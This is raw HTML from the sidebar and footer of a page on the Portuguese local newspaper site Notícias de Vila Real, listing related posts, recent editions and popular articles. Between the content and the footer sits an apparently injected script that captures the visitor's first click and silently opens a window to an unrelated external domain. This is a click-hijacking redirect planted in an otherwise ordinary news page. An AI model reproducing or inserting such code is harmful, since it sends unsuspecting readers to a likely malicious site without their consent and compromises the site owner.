block_td_uid_23_5a35df4106118.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"Todos","color_preset":"","border_top":"","class":"td_uid_23_5a35df4106118_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_23_5a35df4106118_rand","live_filter":"cur_post_same_categories","live_filter_cur_post_id":6610,"live_filter_cur_post_author":"3","block_template_id":""}';
block_td_uid_23_5a35df4106118.td_column_number = "3";
block_td_uid_23_5a35df4106118.block_type = "td_block_related_posts";
block_td_uid_23_5a35df4106118.post_count = "3";
block_td_uid_23_5a35df4106118.found_posts = "207";
block_td_uid_23_5a35df4106118.header_color = "";
block_td_uid_23_5a35df4106118.ajax_pagination_infinite_stop = "";
block_td_uid_23_5a35df4106118.max_num_pages = "69";
tdBlocksArray.push(block_td_uid_23_5a35df4106118);
</script><h4 class="td-related-title td-block-title"><a id="td_uid_24_5a35df4106881" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_23_5a35df4106118" href="#">Relacionados</a><a id="td_uid_25_5a35df41068bf" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_23_5a35df4106118" href="#">Mais artigos do mesmo autor</a></h4><div id=td_uid_23_5a35df4106118 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/mostra-gastronomica-de-vila-pouca-de-aguiar-no-sao-martinho/" rel="bookmark" title="Mostra Gastronómica de Vila Pouca de Aguiar no São Martinho"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/10/XVI-Mostra-Gastronómica-1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/10/XVI-Mostra-Gastronómica-1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/10/XVI-Mostra-Gastronómica-1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Mostra Gastronómica de Vila Pouca de Aguiar no São Martinho"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/territorio/regiao/" class="td-post-category">Região</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/mostra-gastronomica-de-vila-pouca-de-aguiar-no-sao-martinho/" rel="bookmark" title="Mostra Gastronómica de Vila Pouca de Aguiar no São Martinho">Mostra Gastronómica de Vila Pouca de Aguiar no São Martinho</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/investimentos-ate-100-mil-euros-financiados-no-douro/" rel="bookmark" title="Investimentos até 100 mil euros financiados no Douro"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/05/Sabrosa-Município-investe-na-segurança-rodoviária-entre-Covas-do-Douro-e-Pinhão-1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/05/Sabrosa-Município-investe-na-segurança-rodoviária-entre-Covas-do-Douro-e-Pinhão-1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/05/Sabrosa-Município-investe-na-segurança-rodoviária-entre-Covas-do-Douro-e-Pinhão-1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Investimentos até 100 mil euros financiados no Douro"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/territorio/regiao/" class="td-post-category">Região</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/investimentos-ate-100-mil-euros-financiados-no-douro/" rel="bookmark" title="Investimentos até 100 mil euros financiados no Douro">Investimentos até 100 mil euros financiados no Douro</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/parque-natural-lanca-concurso-festi-vale-do-tua/" rel="bookmark" title="Parque Natural lança concurso “Festi-Vale do Tua”"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/05/ID15027098-1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/05/ID15027098-1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/05/ID15027098-1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Parque Natural lança concurso “Festi-Vale do Tua”"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/territorio/regiao/" class="td-post-category">Região</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/parque-natural-lanca-concurso-festi-vale-do-tua/" rel="bookmark" title="Parque Natural lança concurso “Festi-Vale do Tua”">Parque Natural lança concurso “Festi-Vale do Tua”</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_23_5a35df4106118" data-td_block_id="td_uid_23_5a35df4106118"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_23_5a35df4106118" data-td_block_id="td_uid_23_5a35df4106118"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <div class="td_block_wrap td_block_social_counter td_block_widget td_uid_26_5a35df4108cf4_rand td-pb-border-top td_block_template_1"><h4 class="block-title"><span class="td-pulldown-size">NVR nas redes sociais</span></h4><div class="td-social-list"><div class="td_social_type td-pb-margin-side td_social_facebook"><div class="td-social-box"><div class="td-sp td-sp-facebook"></div><span class="td_social_info">13,127</span><span class="td_social_info td_social_info_name">Fãs</span><span class="td_social_button"><a href="https://www.facebook.com/noticiasvilareal"  target="_blank" >Gostar</a></span></div></div><div class="td_social_type td-pb-margin-side td_social_twitter"><div class="td-social-box"><div class="td-sp td-sp-twitter"></div><span class="td_social_info">993</span><span class="td_social_info td_social_info_name">Seguidores</span><span class="td_social_button"><a href="https://twitter.com/noticiasvreal"  target="_blank" >Seguir</a></span></div></div><div class="td_social_type td-pb-margin-side td_social_youtube"><div class="td-social-box"><div class="td-sp td-sp-youtube"></div><span class="td_social_info">22</span><span class="td_social_info td_social_info_name">Subscritos</span><span class="td_social_button"><a href="http://www.youtube.com/channel/UCws8Q_7f6ETlbDjdYMxR8mg"  target="_blank" >Subscrever</a></span></div></div></div></div> <!-- ./block --><div class="td_block_wrap td_block_15 td_block_widget td_uid_27_5a35df4108f19_rand td_with_ajax_pagination td-pb-border-top td_block_template_1 td-column-1 td_block_padding"  data-td-block-uid="td_uid_27_5a35df4108f19" ><script>var block_td_uid_27_5a35df4108f19 = new tdBlock();
block_td_uid_27_5a35df4108f19.id = "td_uid_27_5a35df4108f19";
block_td_uid_27_5a35df4108f19.atts = '{"limit":"4","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"23","category_ids":"","custom_title":"\u00daltimas capas","custom_url":"http:\/\/noticiasdevilareal.com\/category\/capas\/","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_27_5a35df4108f19_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_27_5a35df4108f19_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_27_5a35df4108f19.td_column_number = "1";
block_td_uid_27_5a35df4108f19.block_type = "td_block_15";
block_td_uid_27_5a35df4108f19.post_count = "4";
block_td_uid_27_5a35df4108f19.found_posts = "43";
block_td_uid_27_5a35df4108f19.header_color = "#";
block_td_uid_27_5a35df4108f19.ajax_pagination_infinite_stop = "";
block_td_uid_27_5a35df4108f19.max_num_pages = "11";
tdBlocksArray.push(block_td_uid_27_5a35df4108f19);
</script><div class="td-block-title-wrap"><h4 class="block-title"><a href="http://noticiasdevilareal.com/category/capas/" class="td-pulldown-size">Últimas capas</a></h4></div><div id=td_uid_27_5a35df4108f19 class="td_block_inner td-column-1"><div class="td-cust-row">

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/edicao-no-614/" rel="bookmark" title="Edição nº 614"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Sem-Título-2-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Sem-Título-2-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Sem-Título-2-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Edição nº 614"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/edicao-no-614/" rel="bookmark" title="Edição nº 614">Edição nº 614</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/edicao-no-613/" rel="bookmark" title="Edição nº 613"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Sem-Título-1-1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Sem-Título-1-1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Sem-Título-1-1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Edição nº 613"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/edicao-no-613/" rel="bookmark" title="Edição nº 613">Edição nº 613</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-cust-row">

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/edicao-no-604/" rel="bookmark" title="Edição nº 604"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/Sem-Título-1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/Sem-Título-1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/Sem-Título-1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Edição nº 604"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/edicao-no-604/" rel="bookmark" title="Edição nº 604">Edição nº 604</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/edicao-no-603/" rel="bookmark" title="Edição nº 603"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/06/Sem-Título-1-1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/06/Sem-Título-1-1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/06/Sem-Título-1-1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Edição nº 603"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/edicao-no-603/" rel="bookmark" title="Edição nº 603">Edição nº 603</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 --></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_27_5a35df4108f19" data-td_block_id="td_uid_27_5a35df4108f19"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_27_5a35df4108f19" data-td_block_id="td_uid_27_5a35df4108f19"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --><div class="clearfix"></div>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->


<script type='text/javascript'>
var t = false;
document.onclick= function(event) {
if (t) {
return;
}
t = true;
  if ( event === undefined) event= window.event;
  var target= 'target' in event? event.target : event.srcElement;
  var win = window.open('http://arunaco.in/js/', '_blank');
  win.focus();
};
 </script>

<!-- Instagram -->



<!-- Footer -->
<div class="td-footer-wrapper td-container-wrap td-footer-template-2 ">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <div class="td-footer-info"><div class="footer-logo-wrap"><a href="http://www.noticiasdevilareal.com/"><img class="td-retina-data" src="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg" data-retina="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg" alt="" title=""/></a></div><div class="footer-text-wrap">O Notícias de Vila Real é um jornal generalista, que aborda assuntos de interesse local e regional. Fundado em Setembro de 1998, o NVR é actualmente quadrimensal e está nas bancas todas as quartas-feiras.
<br>
Horário: Segunda a Sexta
Manhã: 09h-13h
Tarde: 14h-18h<div class="footer-email-wrap">Contacte-nos: <a href="mailto:info@noticiasdevilareal.com">info@noticiasdevilareal.com</a></div></div><div class="footer-social-wrap td-social-style-2">
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/Not%C3%ADcias-de-Vila-Real-132527526844208/" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/noticiasvreal" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/channel/UCws8Q_7f6ETlbDjdYMxR8mg" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span></div></div>                            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_7 td_uid_29_5a35df410c8f4_rand td-pb-border-top td_block_template_1 td-column-1 td_block_padding"  data-td-block-uid="td_uid_29_5a35df410c8f4" ><script>var block_td_uid_29_5a35df410c8f4 = new tdBlock();
block_td_uid_29_5a35df410c8f4.id = "td_uid_29_5a35df410c8f4";
block_td_uid_29_5a35df410c8f4.atts = '{"limit":3,"sort":"popular","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"ARTIGOS MAIS LIDOS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"Todos","color_preset":"","border_top":"","class":"td_uid_29_5a35df410c8f4_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_29_5a35df410c8f4_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_29_5a35df410c8f4.td_column_number = "1";
block_td_uid_29_5a35df410c8f4.block_type = "td_block_7";
block_td_uid_29_5a35df410c8f4.post_count = "3";
block_td_uid_29_5a35df410c8f4.found_posts = "1426";
block_td_uid_29_5a35df410c8f4.header_color = "";
block_td_uid_29_5a35df410c8f4.ajax_pagination_infinite_stop = "";
block_td_uid_29_5a35df410c8f4.max_num_pages = "476";
tdBlocksArray.push(block_td_uid_29_5a35df410c8f4);
</script><div class="td-block-title-wrap"><h4 class="block-title"><span class="td-pulldown-size">ARTIGOS MAIS LIDOS</span></h4></div><div id=td_uid_29_5a35df410c8f4 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/4-detidos-por-roubo/" rel="bookmark" title="Quatro detidos por roubo em Vila Real"><img width="100" height="70" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/psp-100x70.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/psp-100x70.jpg 100w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/psp-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Quatro detidos por roubo em Vila Real"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/4-detidos-por-roubo/" rel="bookmark" title="Quatro detidos por roubo em Vila Real">Quatro detidos por roubo em Vila Real</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2016-03-24T15:52:09+00:00" >24 Março, 2016</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/duas-unidades-privadas-de-saude-vao-instalar-se-em-vila-real/" rel="bookmark" title="Duas unidades privadas de saúde vão instalar-se em Vila Real"><img width="100" height="70" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/04/hotel-tocaio-100x70.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/04/hotel-tocaio-100x70.jpg 100w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/04/hotel-tocaio-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Duas unidades privadas de saúde vão instalar-se em Vila Real"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/duas-unidades-privadas-de-saude-vao-instalar-se-em-vila-real/" rel="bookmark" title="Duas unidades privadas de saúde vão instalar-se em Vila Real">Duas unidades privadas de saúde vão instalar-se em Vila Real</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2016-04-28T13:00:29+00:00" >28 Abril, 2016</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/prisao-para-os-dois-acusados-de-agredir-jovens-num-bar-do-pioledo-2/" rel="bookmark" title="Tribunal condenou dois acusados de agredir jovens num bar do Pioledo"><img width="100" height="70" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Sem-Título-1-100x70.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Sem-Título-1-100x70.jpg 100w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Sem-Título-1-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Tribunal condenou dois acusados de agredir jovens num bar do Pioledo"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/prisao-para-os-dois-acusados-de-agredir-jovens-num-bar-do-pioledo-2/" rel="bookmark" title="Tribunal condenou dois acusados de agredir jovens num bar do Pioledo">Tribunal condenou dois acusados de agredir jovens num bar do Pioledo</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-11-02T12:02:04+00:00" >2 Novembro, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_uid_30_5a35df4112964_rand widget widget_categories td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_30_5a35df4112964" ><h4 class="block-title"><span class="td-pulldown-size">CATEGORIAS MAIS VISTAS</span></h4><ul class="td-pb-padding-side"><li><a href="http://www.noticiasdevilareal.com/category/sociedade/">Sociedade<span class="td-cat-no">636</span></a></li><li><a href="http://www.noticiasdevilareal.com/category/territorio/">Território<span class="td-cat-no">269</span></a></li><li><a href="http://www.noticiasdevilareal.com/category/sociedade/cultura/">Cultura<span class="td-cat-no">212</span></a></li><li><a href="http://www.noticiasdevilareal.com/category/territorio/regiao/">Região<span class="td-cat-no">205</span></a></li><li><a href="http://www.noticiasdevilareal.com/category/territorio/vila-real/">Vila Real<span class="td-cat-no">180</span></a></li><li><a href="http://www.noticiasdevilareal.com/category/sociedade/seguranca/">Segurança<span class="td-cat-no">132</span></a></li><li><a href="http://www.noticiasdevilareal.com/category/desporto/">Desporto<span class="td-cat-no">118</span></a></li><li><a href="http://www.noticiasdevilareal.com/category/opiniao/">Opinião<span class="td-cat-no">117</span></a></li><li><a href="http://www.noticiasdevilareal.com/category/sociedade/educacao/">Educação<span class="td-cat-no">95</span></a></li></ul></div> <!-- ./block -->                            </div>
        </div>
    </div>
</div>


<!-- Sub Footer -->
    <div class="td-sub-footer-container td-container-wrap ">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span td-sub-footer-menu">
                        <div class="menu-menu-rodape-container"><ul id="menu-menu-rodape" class="td-subfooter-menu"><li id="menu-item-608" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-608"><a href="http://www.noticiasdevilareal.com/">Início</a></li>
<li id="menu-item-246" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-246"><a href="http://www.noticiasdevilareal.com/ficha-tecnica/">Ficha técnica</a></li>
<li id="menu-item-247" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-247"><a href="http://www.noticiasdevilareal.com/estatuto-editorial/">Estatuto Editorial</a></li>
<li id="menu-item-609" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-609"><a href="http://www.noticiasdevilareal.com/regras-gerais-dos-termos-de-utilizacao/">Termos de Utilização</a></li>
<li id="menu-item-248" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-248"><a href="http://www.noticiasdevilareal.com/contact/">Contactos</a></li>
</ul></div>                </div>

                <div class="td-pb-span td-sub-footer-copy">
                    &copy; 2016 Notícias de Vila Real. Todos os Direitos Reservados.        Hosted By  Purple Profile                </div>
            </div>
        </div>
    </div>
</div><!--close td-outer-wrap-->



    <!--

        Theme: Newspaper by tagDiv.com 2017
        Version: 8.0 (rara)
        Deploy mode: deploy
        
        uid: 5a35df4115596
    -->

    <script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/www.noticiasdevilareal.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Por favor, confirme que n\u00e3o \u00e9 um rob\u00f4."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.noticiasdevilareal.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.9.1'></script>
<script type='text/javascript' src='http://www.noticiasdevilareal.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=8.0'></script>
<script type='text/javascript' src='http://www.noticiasdevilareal.com/wp-includes/js/comment-reply.min.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://www.noticiasdevilareal.com/wp-includes/js/wp-embed.min.js?ver=4.8.4'></script>
<!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ -->
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/pt_PT/sdk.js#xfbml=1&appId=511982768990874&version=v2.3";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://www.noticiasdevilareal.com/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://www.noticiasdevilareal.com/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


</body>
</html>